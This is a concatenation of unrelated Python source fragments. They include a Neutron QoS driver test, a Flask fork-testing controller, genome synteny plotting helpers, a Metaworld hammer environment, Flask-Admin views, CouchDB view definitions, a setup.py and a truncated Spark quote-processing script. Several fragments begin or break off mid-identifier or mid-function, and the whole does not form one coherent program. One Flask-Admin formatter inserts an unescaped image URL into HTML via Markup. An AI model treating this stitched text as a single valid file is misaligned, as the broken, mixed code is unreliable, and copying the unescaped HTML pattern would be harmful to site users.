gate the role built-in annotations can play here. elif anno.hasanno(node.value, 'type'): parent_type = anno.getanno(node.value, 'type') if hasattr(parent_type, node.attr): # This should hold for static members like methods. # This would not hold for dynamic members like function attributes. # For the dynamic case, we simply leave the node without an annotation, # and let downstream consumers figure out what to do. anno.setanno(node, 'parent_type', parent_type) anno.setanno(node, 'live_val', getattr(parent_type, node.attr)) anno.setanno(node, 'fqn', anno.getanno(node.value, 'type_fqn') + (node.attr,)) elif isinstance(node.value, gast.Name): stem_name = node.value # All nonlocal symbols should be fully resolved. assert anno.hasanno(stem_name, NodeAnno.IS_LOCAL), stem_name # TODO(mdan): Figure out what to do when calling attribute on local object # Maybe just leave as-is? return node def resolve(node, context, literals): return LiveValueResolver(context, literals).visit(node)
# Copyright 2015 Mellanox Technologies, Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import mock from oslo_utils import uuidutils from neutron import context from neutron.objects.qos import policy from neutron.objects.qos import rule from neutron.plugins.ml2.drivers.mech_sriov.agent.common import exceptions from neutron.plugins.ml2.drivers.mech_sriov.agent.extension_drivers import ( qos_driver) from neutron.tests import base class QosSRIOVAgentDriverTestCase(base.BaseTestCase): ASSIGNED_MAC = '00:00:00:00:00:66' PCI_SLOT = '0000:06:00.1' def setUp(self): super(QosSRIOVAgentDriverTestCase, self).setUp() self.context = context.get_admin_context() self.qos_driver = qos_driver.QosSRIOVAgentDriver() self.qos_driver.initialize() self.qos_driver.eswitch_mgr = mock.Mock() self.qos_driver.eswitch_mgr.set_device_max_rate = mock.Mock() self.max_rate_mock = self.qos_driver.eswitch_mgr.set_device_max_rate self.rule = self._create_bw_limit_rule_obj() self.qos_policy = self._create_qos_policy_obj([self.rule]) self.port = self._create_fake_port() def _create_bw_limit_rule_obj(self): rule_obj = rule.QosBandwidthLimitRule() rule_obj.id = uuidutils.generate_uuid() rule_obj.max_kbps = 2 rule_obj.max_burst_kbps = 200 rule_obj.obj_reset_changes() return rule_obj def _create_qos_policy_obj(self, rules): policy_dict = {'id': uuidutils.generate_uuid(), 'tenant_id': uuidutils.generate_uuid(), 'name': 'test', 'description': 'test', 'shared': False, 'rules': rules} policy_obj = policy.QosPolicy(self.context, **policy_dict) policy_obj.obj_reset_changes() return policy_obj def _create_fake_port(self): return {'port_id': uuidutils.generate_uuid(), 'profile': {'pci_slot': self.PCI_SLO
T}, 'device': self.ASSIGNED_MAC} def test_create_rule(self): self.qos_driver.create(self.port, self.qos_policy) self.max_rate_mock.assert_called_once_with( self.ASSIGNED_MAC, self.PCI_SLOT, self.rule.max_kbps) def test_update_rule(self): self.qos_driver.update(self.port, self.qos_policy) self.max_ra
te_mock.assert_called_once_with( self.ASSIGNED_MAC, self.PCI_SLOT, self.rule.max_kbps) def test_delete_rules(self): self.qos_driver.delete(self.port, self.qos_policy) self.max_rate_mock.assert_called_once_with( self.ASSIGNED_MAC, self.PCI_SLOT, 0) def test__set_vf_max_rate_captures_sriov_failure(self): self.max_rate_mock.side_effect = exceptions.SriovNicError() self.qos_driver._set_vf_max_rate(self.ASSIGNED_MAC, self.PCI_SLOT) def test__set_vf_max_rate_unknown_device(self): with mock.patch.object(self.qos_driver.eswitch_mgr, 'device_exists', return_value=False): self.qos_driver._set_vf_max_rate(self.ASSIGNED_MAC, self.PCI_SLOT) self.assertFalse(self.max_rate_mock.called)
""" mod_customized Controllers =================== In this module, users can test their fork branch with customized set of regression tests """ from flask import Blueprint, g, request, redirect, url_for, flash from github import GitHub, ApiError from datetime import datetime, timedelta from decorators import template_renderer, get_menu_entries from mod_auth.controllers import login_required, check_access_rights from mod_auth.models import Role, User from mod_test.models import Fork, Test, TestType, TestPlatform from mod_customized.forms import TestForkForm from mod_customized.models import TestFork, CustomizedTest from mod_regression.models import Category, regressionTestLinkTable, RegressionTest from mod_test.controllers import get_data_for_test, TestNotFoundException from mod_auth.controllers import fetch_username_from_token from sqlalchemy import and_ mod_customized = Blueprint('custom', __name__) @mod_customized.before_app_request def before_app_request(): if g.user is not None: g.menu_entries['custom'] = { 'title': 'Customize Test', 'icon': 'code-fork', 'route': 'custom.index', 'access': [Role.tester, Role.contributor, Role.admin] } @mod_customized.route('/', methods=['GET', 'POST']) @login_required @check_access_rights([Role.tester, Role.contributor, Role.admin]) @template_renderer() def index(): """ Display a form to allow u
sers to run tests. User can enter commit or select the commit from their repo that are not more than 30 days old. User can customized test based on selected regression tests and platforms. Also Display list of customized tests started by user. User will be redirecte
d to the same page on submit. """ fork_test_form = TestForkForm(request.form) username = fetch_username_from_token() commit_options = False if username is not None: gh = GitHub(access_token=g.github['bot_token']) repository = gh.repos(username)(g.github['repository']) # Only commits since last month last_month = datetime.now() - timedelta(days=30) commit_since = last_month.isoformat() + 'Z' commits = repository.commits().get(since=commit_since) commit_arr = [] for commit in commits: commit_url = commit['html_url'] commit_sha = commit['sha'] commit_option = ( '<a href="{url}">{sha}</a>').format(url=commit_url, sha=commit_sha) commit_arr.append((commit_sha, commit_option)) # If there are commits present, display it on webpage if len(commit_arr) > 0: fork_test_form.commit_select.choices = commit_arr commit_options = True fork_test_form.regression_test.choices = [(regression_test.id, regression_test) for regression_test in RegressionTest.query.all()] if fork_test_form.add.data and fork_test_form.validate_on_submit(): import requests regression_tests = fork_test_form.regression_test.data commit_hash = fork_test_form.commit_hash.data repo = g.github['repository'] platforms = fork_test_form.platform.data api_url = ('https://api.github.com/repos/{user}/{repo}/commits/{hash}').format( user=username, repo=repo, hash=commit_hash ) # Show error if github fails to recognize commit response = requests.get(api_url) if response.status_code == 500: fork_test_form.commit_hash.errors.append('Error contacting Github') elif response.status_code != 200: fork_test_form.commit_hash.errors.append('Wrong Commit Hash') else: add_test_to_kvm(username, commit_hash, platforms, regression_tests) return redirect(url_for('custom.index')) populated_categories = g.db.query(regressionTestLinkTable.c.category_id).subquery() categories = Category.query.filter(Category.id.in_(populated_categories)).order_by(Category.name.asc()).all() tests = Test.query.filter(and_(TestFork.user_id == g.user.id, TestFork.test_id == Test.id)).order_by( Test.id.desc()).limit(50).all() return { 'addTestFork': fork_test_form, 'commit_options': commit_options, 'tests': tests, 'TestType': TestType, 'GitUser': username, 'categories': categories, 'customize': True } def add_test_to_kvm(username, commit_hash, platforms, regression_tests): """ Create new tests and add it to CustomizedTests based on parameters. :param username: git username required to find fork :type username: str :param commit_hash: commit hash of the repo user selected to run test :type commit_hash: str :param platforms: platforms user selected to run test :type platforms: list :param regression_tests: regression tests user selected to run tests :type regression_tests: list """ fork_url = ('https://github.com/{user}/{repo}.git').format( user=username, repo=g.github['repository'] ) fork = Fork.query.filter(Fork.github == fork_url).first() if fork is None: fork = Fork(fork_url) g.db.add(fork) g.db.commit() for platform in platforms: platform = TestPlatform.from_string(platform) test = Test(platform, TestType.commit, fork.id, 'master', commit_hash) g.db.add(test) g.db.commit() for regression_test in regression_tests: customized_test = CustomizedTest(test.id, regression_test) g.db.add(customized_test) test_fork = TestFork(g.user.id, test.id) g.db.add(test_fork) g.db.commit()
#!/usr/bin/python # Copyright 2017 Dhvani Patel # # This file is part of UnnaturalCode. # # UnnaturalCode is free software: you can redistribute it and/or modify # it
under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # UnnaturalCode is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for mor
e details. # # You should have received a copy of the GNU Affero General Public License # along with UnnaturalCode. If not, see <http://www.gnu.org/licenses/>. from check_eclipse_syntax import checkEclipseSyntax from compile_error import CompileError import unittest ERROR_TEST = """public class HelloWorld { public static void main(String[] args) // Prints "Hello, World" to the terminal window. System.out.println("Hello, World) } } """ class TestStringMethods(unittest.TestCase): def test_syntax_ok(self): toTest = checkEclipseSyntax('public class Hello{ int a= 5;}') self.assertTrue(toTest is None) def test_syntax_error(self): toTest = checkEclipseSyntax(ERROR_TEST) self.assertEqual(toTest[0], [1, 2, 3, 4, 5]) self.assertEqual(toTest[1], [3, 5, 5, 5, 5]) if __name__ == '__main__': unittest.main()
pend((chr_name, chr_id, chr_len, cent_s, cent_e)) return r def build_ref_config_file(chr2acc_fname, agp_fnames): """ Build a configuration file of reference genome chromosomes from a chr2acc file and a series of AGP files that describe the assembled chromosomes. :param chr2acc_fname: a name of a chr2acc file :param agp_fnames: a list of reference chromosome AGP files :returns: a list of the configuration file """ acc2chr = {} with open(chr2acc_fname) as chr2acc_file: acc2chr = {x[1]: x[0] for x in map(lambda s: s.split('\t', 1), filter(lambda s: not s.startswith('#'), map(str.rstrip, chr2acc_file.readlines())))} chr_lengths = {} # values of the chr_centromeres dictionary are 2-tuples of start and # end positions of a centromere on a chromosome chr_centromeres = {} for k in agp_fnames: with gzip.open(k, "rt") as agp_file: lines = map(lambda x: (x[0], int(x[1]), int(x[2])) + tuple(x[3:]), map(lambda s: s.split('\t', 8), map(str.rstrip, filter(lambda s: not s.startswith('#'), agp_file.readlines())))) lines = sorted(lines, key=itemgetter(1)) chr_id = set(map(itemgetter(0), lines)) assert len(chr_id) == 1, \ "multiple chromosomes in an AGP file" chr_id = chr_id.pop() centromere = list(filter(lambda x: x[6] == "centromere", lines)) if centromere: assert len(centromere) == 1, "multiple centromeres" centromere = centromere[0] cent_start, cent_end = centromere[1], centromere[2] assert chr_id not in chr_centromeres or \ chr_centromeres[chr_id] == (cent_start, cent_end), \ "conflicting centromere records" chr_centromeres[chr_id] = (cent_start, cent_end) else: chr_centromeres[chr_id] = (None, None) chr_len = lines[-1][2] assert chr_id not in chr_lengths or \ chr_lengths[chr_id] == chr_len, \ "conflicting chromosome lengths" chr_lengths[chr_id] = chr_len return [(v, k, chr_lengths[k]) + chr_centromeres[k] for k, v in acc2chr.items()] def plot_frame(ref_chrom_config, p): """ Plot a frame of reference chromosomes for synteny blocks based on them. :param ref_chrom_config: a list of 5-tuples describing the reference chromosomes as returned by the load_ref_config function. :param p: a plotting parameter; its value should be between 10 and 100 :returns: a 2-tuple which first element is the plot frame Figure object and the secon
d element is the list of the AxesSubplot objects """ fig, axes = plt.subplots(ncols=1, nrows=len(ref_chrom_config)) max_len = reduce(max, map(itemgetter(2), ref_chrom_config)) shift = max_len / 30 for ax, chrom in zip(axes, ref_chrom_config): chr_name, _, chr_len, _, _ = chrom ax.set_xlim([-shift, max_len]) ax.set_ylim([-p, p])
ax.axis('off') ax.text(-shift, 0, chr_name, horizontalalignment="right", verticalalignment="center") ax.add_line(Line2D([0, chr_len], [0, 0], color="black", linewidth=0.5)) return fig, axes def add_centromeres(fig, ref_chrom_config, p, style): """ Add centromeres to a reference chromosome frame. :param fig: a Figure object of a reference chromosome frame :param ref_chrom_config: a list of 5-tuples describing the reference chromosomes as returned by the load_ref_config function :param p: a plotting parameter; its value should be between 10 and 100 :returns: the Figure object of the reference chromosome frame with added centromeres """ assert style in {"triangle", "butterfly"}, \ "incorrect centromere style" for ax, chrom in zip(fig.get_axes(), ref_chrom_config): _, _, _, cent_s, cent_e = chrom if cent_s is not None and cent_e is not None: ax.add_patch(Polygon(np.array( [[cent_s, p], [cent_e, p], [(cent_s + cent_e)/2, p/5]]), color="black")) if style == "butterfly": ax.add_patch(Polygon(np.array( [[cent_s, -p], [cent_e, -p], [(cent_s + cent_e)/2, -p/5]]), color="black")) return fig def extend_frame(axes, p): """ Extend a reference chromosome frame to add one more track of synteny blocks. :param axes: a list of the AxesSubplot objects returned by the plot_frame function :param p: a plotting parameter; its value should be between 150 and 300 :returns: the list of the AxesSubplot objects which correspond to the extended reference chromosome frame """ for ax in axes: y_min, y_max = ax.get_ylim() y_min -= 2*p ax.set_ylim((y_min, y_max)) return axes def add_synteny_block(ref_chrom_config, axes, chrom, start, end, strand, e_color, f_color, p): """ Add a synteny block to the reference chromosome frame. :param ref_chrom_config: a list of 5-tuples describing the reference chromosomes as returned by the load_ref_config function :param axes: a list of the AxesSubplot objects returned by the plot_frame function :param chrom: the chromosome a syntenic block is located on :param start: the start position of a syntenic block :param end: the end position of a syntenic block :param strand: the syntenic block orientation ('+', '-', or None) :param e_color: color of the block edge :param f_color: color the block is filled in :param p: a plotting parameter; its value should be between 150 and 300 :returns: the list of the AxesSubplot objects with the added synteny block """ global_x_max = reduce(max, map(lambda x: x.get_xlim()[1], axes)) alpha = global_x_max / 100 chr_dict = {v: k for k, v in enumerate(map(itemgetter(1), ref_chrom_config))} ax = axes[chr_dict[chrom]] _, x_max = ax.get_xlim() y_min, _ = ax.get_ylim() assert strand is None or strand in {'+', '-'}, "incorrect strand" l = end - start if l < global_x_max / 300: return axes if strand is None: r = Rectangle((start, y_min + p/4), height=3*p/2, width=end-start, edgecolor=e_color, facecolor=f_color, fill=True, linewidth=0.5) ax.add_patch(r) else: alpha = x_max/(2*p) if strand == '+': if l > alpha: p = Polygon(np.array([[start, y_min + 7*p/4], [end - alpha, y_min + 7*p/4], [end, y_min + p], [end - alpha, y_min + p/4], [start, y_min + p/4]]), edgecolor=e_color, facecolor=f_color, fill=True, linewidth=0.5) else: p = Polygon(np.array([[start, y_min + 7*p/4], [end, p], [start, y_min + p/4]]), edgecolor=e_color, facecolor=f_color, fill=True, linewidth=0.5) else: if l > alpha: p = Polygon(np.array([[end, y_min + 7*p/4], [start + alpha, y_min + 7*p/4], [start, y_min + p], [start + alpha, y_min + p/4], [end, y_min + p/4]]),
# This file is generated by /tmp/buildd/python-numpy-1.8.2/setup.py # It contains system_info results at the time of building this package. __all__ = ["get_info","show"] blas_info={'libraries': ['blas'], 'library_dirs': ['/usr/lib'], 'language': 'f77'} lapack_info={'libraries': ['lapack'], 'library_dirs': ['/usr/lib'], 'language': 'f77'} atlas_threads_info={} blas_opt_info={'libraries': ['blas'], 'library_dirs': ['/usr/lib'], 'define_macros': [('NO_ATLAS_INFO', 1)], 'language': 'f77'} openblas_info={} atlas_blas_threads_info={} lapack_opt_info={'libraries': ['lapack', 'blas'], 'library_dirs': ['/usr/lib'], 'define_macros': [('NO_ATLAS_INFO', 1)], 'language': 'f77'} atlas_info={} lapack_mkl_info={} blas_mkl_info={} atlas_blas_info={} mkl_info={} def get_info(name): g = globals() return g.get(name, g.get(name + "_info", {})) def show(): for name,info_dict in globals().items(): if name[0] == "_" or type(info_dict) is not type({}): continue print(name + ":") if not info_dict: print(" NOT AVAILABLE") for k,v in info_dic
t.items(): v = str(v)
if k == "sources" and len(v) > 200: v = v[:60] + " ...\n... " + v[-60:] print(" %s = %s" % (k,v))
import numpy as np from gym.spaces import Box from metaworld.envs import reward_utils from metaworld.envs.asset_path_utils import full_v2_path_for from metaworld.envs.mujoco.sawyer_xyz.sawyer_xyz_env import SawyerXYZEnv, _assert_task_is_set class SawyerHammerEnvV2(SawyerXYZEnv): HAMMER_HANDLE_LENGTH = 0.14 def __init__(self): hand_low = (-0.5, 0.40, 0.05) hand_high = (0.5, 1, 0.5) obj_low = (-0.1, 0.4, 0.0) obj_high = (0.1, 0.5, 0.0) goal_low = (0.2399, .7399, 0.109) goal_high = (0.2401, .7401, 0.111) super().__init__( self.model_name, hand_low=hand_low, hand_high=hand_high, ) self.init_config = { 'hammer_init_pos': np.array([0, 0.5, 0.0]), 'hand_init_pos': np.array([0, 0.4, 0.2]), } self.goal = self.init_config['hammer_init_pos'] self.hammer_init_pos = self.init_config['hammer_init_pos'] self.obj_init_pos = self.hammer_init_pos.copy() self.hand_init_pos = self.init_config['hand_init_pos'] self.nail_init_pos = None self._random_reset_space = Box(np.array(obj_low), np.array(obj_high)) self.goal_space = Box(np.array(goal_low), np.array(goal_high)) @property def model_name(self): return full_v2_path_for('sawyer_xyz/sawyer_hammer.xml') @_assert_task_is_set def evaluate_state(self, obs, action): ( reward, reward_grab, reward_ready, reward_success, success ) = self.compute_reward(action, obs) info = { 'success': float(success), 'near_object': reward_ready, 'grasp_success': reward_grab >= 0.5, 'grasp_reward': reward_grab, 'in_place_reward': reward_success, 'obj_to_target': 0, 'unscaled_reward': reward, } return reward, info def _get_id_main_object(self): return self.unwrapped.model.geom_name2id('HammerHandle') def _get_pos_objects(self): return np.hstack(( self.get_body_com('hammer').copy(), self.get_body_com('nail_link').copy() )) def _get_quat_objects(self): return np.hstack(( self.sim.data.get_body_xquat('hammer'), self.sim.data.get_body_xquat('nail_link') )) def _set_hammer_xyz(self, pos): qpos = self.data.qpos.flat.copy() qvel = self.data.qvel.flat.copy() qpos[9:12] = pos.copy() qvel[9:15] = 0 self.set_state(qpos, qvel) def reset_model(self): self._reset_hand() # Set position of box & nail (these are not randomized) self.sim.model.body_pos[self.model.body_name2id( 'box' )] = np.array([0.24, 0.85, 0.0]) # Update _target_pos self._target_pos = self._get_site_pos('goal') # Randomize hammer position self.hammer_init_pos = self._get_state_rand_vec() if self.random_init \ else self.init_config['hammer_init_pos'] self.nail_init_pos = self._get_site_pos('nailHead') self.obj_init_pos = self.hammer_init_pos.copy() self._set_hammer_xyz(self.hammer_init_pos) return self._get_obs() @staticmethod def _reward_quat(obs): # Ideal laid-down wrench has quat [1, 0, 0, 0] # Rather than deal with an angle between quaternions, just approximate: ideal = np.array([1., 0., 0., 0.]) error = np.linalg.norm(obs[7:11] - ideal) return max(1.0 - error / 0.4, 0.0) @staticmethod def _reward_pos(hammer_head, target_pos): pos_error = target_pos - hammer_head a = 0.1 # Relative importance of just *trying* to lift the hammer b = 0.9 # Relative importance of hitting the nail lifted = hammer_head[2] > 0.02 in_place = a * float(lifted) + b * reward_utils.tolerance( np.linalg.norm(pos_error), bounds=(0, 0.02),
margin=0.2, sigmoid='long_tail', ) return in_place def compute_reward(self, actions, obs): hand = obs[:3] hammer = obs[4:7] hammer_head = hammer + np.array([.16, .06, .0]) # `self._gripper_caging_reward` assumes that the target object can be # approximated as a sphere. This is not true for the hammer handle, so # to avoid re-writing the `self._gripper_ca
ging_reward` we pass in a # modified hammer position. # This modified position's X value will perfect match the hand's X value # as long as it's within a certain threshold hammer_threshed = hammer.copy() threshold = SawyerHammerEnvV2.HAMMER_HANDLE_LENGTH / 2.0 if abs(hammer[0] - hand[0]) < threshold: hammer_threshed[0] = hand[0] reward_quat = SawyerHammerEnvV2._reward_quat(obs) reward_grab = self._gripper_caging_reward( actions, hammer_threshed, object_reach_radius=0.01, obj_radius=0.015, pad_success_thresh=0.02, xz_thresh=0.01, high_density=True, ) reward_in_place = SawyerHammerEnvV2._reward_pos( hammer_head, self._target_pos ) reward = (2.0 * reward_grab + 6.0 * reward_in_place) * reward_quat # Override reward on success. We check that reward is above a threshold # because this env's success metric could be hacked easily success = self.data.get_joint_qpos('NailSlideJoint') > 0.09 if success and reward > 5.: reward = 10.0 return ( reward, reward_grab, reward_quat, reward_in_place, success, )
from random import randint import os PAN_HOST = "pan.baidu.com" PAN_INDEX = "http://" + PAN_HOST DISK_HOME = PAN_INDEX + '/disk/home' FILE_MANAGER = PAN_INDEX + "/api/filemanager" CLOUD_DL = PAN_INDEX + "/rest/2.0/services/cloud_dl" PASSPORT_HOST = 'passport.baidu.com' PASSPORT_INDEX = "https://" + PASSPORT_HOST PASSPORT_API = PASSPORT_INDEX + "/v2/api" USERAGENTLIST = [ 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom
e/41.0.2272.89 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',] USERAGENT = USERAGENTLIST[randint(0,len(USERAGENTLIST)-1)] GREEN = u"\033[42m%s\033[m" BLUE = u"\033[44m%s\033[m" RED = u"\033[41m%s\033[0m" WHITE= u"%s" SAVINGPATH = os.path.expanduser("~/Downloads")
# -*- coding: utf-8 -*- from __future__ import unicode_literals from
wtforms import validators from jinja2 import Markup from flask.ext.admin.contr
ib.sqla import ModelView from studio.core.engines import db from suibe.models import SlideModel, ArticleModel from .forms import CKTextAreaField class Article(ModelView): create_template = 'panel/article_edit.html' edit_template = 'panel/article_edit.html' column_labels = {'id': 'ID', 'title': '标题', 'is_sticky': '置顶', 'channel': '频道', 'date_published': '发布时间', 'date_created': '创建时间'} column_list = ['id', 'channel', 'is_sticky', 'title', 'date_published', 'date_created'] column_searchable_list = ['title', ] column_default_sort = ('date_published', True) form_extra_fields = { 'content': CKTextAreaField('内容', validators=[validators.Required()]), } def __init__(self, **kwargs): super(Article, self).__init__(ArticleModel, db.session, **kwargs) def create_form(self, obj=None): form = super(Article, self).create_form() delattr(form, 'date_created') return form def edit_form(self, obj=None): form = super(Article, self).edit_form(obj=obj) delattr(form, 'date_created') return form class Slide(ModelView): column_labels = {'id': 'ID', 'order': '排序', 'title': '标题', 'describe': '描述', 'image': '图片链接', 'link': '链接', 'date_created': '创建时间'} column_list = ['id', 'order', 'title', 'describe', 'image', 'link', 'date_created'] column_default_sort = ('order', True) form_args = { 'image': {'label': '图片', 'validators': [validators.Required(), validators.URL()]}, 'link': {'label': '链接', 'validators': [validators.Required(), validators.URL()]}, } def _show_image(self, context, model, name): image = model.image.strip() if model.image else '' return Markup('<img src=%s width=200 height=200 />' % image) column_formatters = { 'image': _show_image, } def __init__(self, **kwargs): super(Slide, self).__init__(SlideModel, db.session, **kwargs) def create_form(self, obj=None): form = super(Slide, self).create_form() delattr(form, 'date_created') return form def edit_form(self, obj=None): form = super(Slide, self).edit_form(obj=obj) delattr(form, 'date_created') return form
# -*- coding: utf-8 -
*- import mock import pytest from future.moves.urllib.parse import urlparse, urljoin from addons.base.tests import views from addons.base.tests.utils import MockFolder from addons.mendeley.models import Mendeley from addons.mendeley.tests.utils import MendeleyTestCase, mock_responses from tests.base import OsfTestCase from addons.mendeley.provider i
mport MendeleyCitationsProvider from addons.mendeley.serializer import MendeleySerializer API_URL = 'https://api.mendeley.com' pytestmark = pytest.mark.django_db class TestAuthViews(MendeleyTestCase, views.OAuthAddonAuthViewsTestCaseMixin, OsfTestCase): pass class TestConfigViews(MendeleyTestCase, views.OAuthCitationAddonConfigViewsTestCaseMixin, OsfTestCase): folder = MockFolder() Serializer = MendeleySerializer client = Mendeley citationsProvider = MendeleyCitationsProvider foldersApiUrl = urljoin(API_URL, 'folders') documentsApiUrl = urljoin(API_URL, 'documents') mockResponses = mock_responses @mock.patch('addons.mendeley.models.NodeSettings._fetch_folder_name', mock.PropertyMock(return_value='Fake Name')) def test_deauthorize_node(self): super(TestConfigViews, self).test_deauthorize_node()
# Copyright (C) 2010-2019 The ESPResSo project # # This file is part of ESPResSo. # # ESPResSo is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # ESPResSo is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """ Visualize the system cells and MPI domains. Run ESPResSo in parallel to color particles by node. With OpenMPI, this can be achieved using ``mpiexec -n 4 ./pypresso ../samples/visualization_cellsystem.py``. Set property ``system.cell_system.node_grid = [i, j, k]`` (with ``i * j * k`` equal to the number of MPI ranks) to change the way the cellsystem is partitioned. Only the domain of MPI rank 0 will be shown in wireframe. """ import espressomd import espressomd.visualization_opengl import numpy as np required_features = ["LENNARD_JONES"] espressomd.assert_features(required_features) box = [40, 30, 20] system = espressomd.System(box_l=box) visualizer = espressomd.visualization_opengl.openGLLive( system, window_size=[800,
800], background_color=[0, 0, 0], camera_position=[20, 15, 80], particle_coloring='node', draw_nodes=True, draw_cells=True) system.time_step = 0.0005 system.cell_system.set_regular_decomposition(use_verlet_lists=True) system.cell_system.skin = 0.4 #system.cell_system.node_grid = [i, j, k] for i in range(100): system.part.add(pos=box * np.random.random(3)) system.non_bo
nded_inter[0, 0].lennard_jones.set_params( epsilon=100.0, sigma=1.0, cutoff=3.0, shift="auto") energy = system.analysis.energy() print(f"Before Minimization: E_total = {energy['total']:.2e}") system.integrator.set_steepest_descent(f_max=50, gamma=30.0, max_displacement=0.001) system.integrator.run(10000) system.integrator.set_vv() energy = system.analysis.energy() print(f"After Minimization: E_total = {energy['total']:.2e}") print("Tune skin") system.cell_system.tune_skin(0.1, 4.0, 1e-1, 1000) print(system.cell_system.get_state()) system.thermostat.set_langevin(kT=1, gamma=1, seed=42) visualizer.run(1)
# -*- coding: utf-8 -*- """ ################################################ Plataforma ActivUFRJ ################################################ :Author: *Núcleo de Computação Eletrônica (NCE/UFRJ)* :Contact: carlo@nce.ufrj.br :Date: $Date: 2009-2010 $ :Status: This is a "work in progress" :Revision: $Revision: 0.01 $ :Home: `LABASE `__ :Copyright: ©2009, `GPL """ from couchdb.design import ViewDefinition import core.database ################################################ # CouchDB Permanent Views ################################################ # Retorna lista de questões usadas num quiz, com todas as informações adicionais # # Uso: database.ACTIVDB.view('activity/by_group',startkey=[registry_id],endkey=[id, {}, {}]) activity_by_group = ViewDefinition('activity', 'by_group', \ ''' function(doc) { if (doc.type=="activity") { emit([doc.registry_id, doc.group_id, doc.status], 1); } } ''', u''' function(keys, values) { return sum(values); } ''') # Retorna lista de questões usadas num quiz, com todas as informações adicionais # # Uso: database.ACTIVDB.view('activity/finalized',startkey=[registry_id],endkey=[id, {}, {}]) activity_finalized_and_groups = ViewDefinition('activity', 'finalized_and_groups', \ ''' function(doc) { if (doc.type=="activity" && doc.status == "finalizado") { emit([doc.registry_id, doc.group_id, doc.data_cri, 1], doc);
} if (doc.type=="group" ) { emit([doc.registry_id, doc._id, doc.data_cri, 0], doc); } } ''') # Retorna lista de questões usadas num quiz, sem a informação de grupos # # Uso: database.ACTIVDB.view('activity/finalized',s
tartkey=[registry_id],endkey=[id, {}, {}]) activity_list_by_registry = ViewDefinition('activity', 'list_by_registry', \ ''' function (doc) { if (doc.type=="activity" ) { emit([doc.registry_id, doc.group_id, doc.data_cri,1], doc); } if (doc.type=="group") { emit([doc.registry_id, doc._id, doc.data_cri, 0], doc); } } ''') # Retorna lista de questões usadas num quiz, com todas as informações adicionais # # Uso: database.ACTIVDB.view('activity/finalized',startkey=[registry_id],endkey=[id, {}, {}]) activity_Nfinalized = ViewDefinition('activity', 'Nfinalized', \ ''' function(doc) {if (doc.type=="activity" && (!(doc.status == "finalizado"))) { emit([doc.registry_id, doc.group_id, doc.data_cri, 1], doc); } if (doc.type=="group" ) { emit([doc.registry_id, doc._id, doc.data_cri, 0], doc); } } ''') activity_pendent = ViewDefinition('activity', 'pendent', \ ''' function(doc) { if (doc.type=="activity" && (!(doc.status == "finalizado"))) { for (e in doc.encarregados){ emit([doc.encarregados[e], doc.registry_id, doc.data_cri, 1], doc); } } if (doc.type=="activity" && (!(doc.status == "finalizado"))) { for (e in doc.encarregados){ emit([doc.encarregados[e], doc.registry_id, doc.data_cri, 0], doc.group_id); } } } ''',) ViewDefinition.sync_many(core.database.ACTIVDB, [ activity_by_group, \ activity_Nfinalized, \ activity_pendent, \ activity_finalized_and_groups, \ activity_list_by_registry \ ])
# encoding: utf-8 from setuptools import setup, find_packages
import toasyncio setup( name='toasyncio', packages=find_packages(exclude=['tests']), install_requires=( 'tornado>=4.2', 'asyncio', ), author=toasyncio.__author__, version=toasyncio.__version__,
author_email=", ".join("{email}".format(**a) for a in toasyncio.author_info), long_description=open('README.rst', 'r').read(), license='MIT', keywords=( "tornado", "asyncio", ), url='https://github.com/mosquito/toasyncio', description='Transparent convert any asyncio futures and inline yield methods to tornado futures.', zip_safe=False, classifiers=[ 'Environment :: Console', 'Programming Language :: Python :: 3 :: Only', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', ], )
# Project : Dlab-Finance # W251 Nital Patwa and Ritesh Soni # Desc : This program counts for each exchange, the #of times it produced best bid (or ask) and average size of bid (or ask) # The purpose is to understand what roles exchanges such as BATS play. # Usage Instructions # Change inputDir for daily quote file and outputDir for location of output # ./submit.sh 4 8G nbboex.py # ^#of nodes ''' fields of dailyquotes file taqquote [0:8]HHMMSSXXX [9] text EXCHANGE N Nyse T/Q NASDAQ [10:25] text symbol 6+10 [26:36] bid price 7+4 [37:43] bid size (units) [44:54] ask price 7+4 [55:61] ask size [62] text Condition of quote [63:66] market maker [67] bid exchange [68] ask aexchange [69:84] int seqno [85] int bbo indicator [86] int NASDAQ BBO indocator [87] text cancel/correction A=Normal B=Cancel C=Corrected-price [88] text C=CTA N=UTP [90] text Retail interest indicator [...] ''' import sys from random import random from operator import add from pyspark import SparkContext, SparkConf inputDir="/global/scratch/npatwa/sparkinput/taqquote20100505" outputDir="/global/scratch/npatwa/sparkoutput/nbboexsize20100505/" def processquote (record): # Sort by index created using zipWithIndex to preserve ordering in tied timestamps listOrig = sorted(record[1]) list1 = [rec for rec in listOrig if ((int(rec[1]) >= 93000000) and (int(rec[1]) <= 160000000))] # filter the list for regular stock hours # Setup exchangeList for NBBO calculation exchangeList = ['A','B','C','D','I','J','K','M','N','T','P','S','Q','W','X','Y','Z'] bidList = [0]*len(exchangeList) bidSize = [0]*len(exchangeList) askList = [sys.maxsize]*len(exchangeList) askSize = [0]*len(exchangeList) nbboList=[] bbExCnt = 